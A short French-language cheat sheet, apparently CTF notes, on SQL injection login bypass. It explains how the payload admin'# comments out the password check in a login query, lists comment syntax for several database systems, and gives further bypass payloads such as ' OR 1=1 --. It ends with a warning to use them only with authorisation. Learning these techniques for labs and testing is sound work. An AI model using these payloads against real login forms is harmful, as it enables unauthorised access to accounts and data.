SQL Injection (SQLi)
Auth Bypass - Commentaire SQL
La technique la plus basique : injecter un commentaire SQL pour couper la verification du mot de passe.
Payload
admin'#
- Champ username :
admin'# - Champ password : n'importe quoi
Comment ca marche
La requete SQL du serveur ressemble a :
SELECT * FROM users WHERE username = '[input]' AND password = '[input]';
En injectant admin'#, la requete devient :
SELECT * FROM users WHERE username = 'admin'#' AND password = 'whatever';
Le # commente tout le reste de la ligne. Le serveur verifie uniquement que l'utilisateur admin existe, sans verifier le mot de passe.
Box :
Appointment
Variantes de commentaires SQL
| SGBD | Commentaire |
|---|---|
| MySQL / MariaDB | # ou -- (avec espace) |
| PostgreSQL | -- |
| MSSQL | -- |
| Oracle | -- |
| SQLite | -- |
Autres payloads d'auth bypass
' OR 1=1 --
' OR 1=1 #
admin' --
admin' OR '1'='1
' OR ''='
attention
Ces payloads sont a utiliser uniquement sur des machines ou vous avez l'autorisation (lab, CTF, pentest autorise).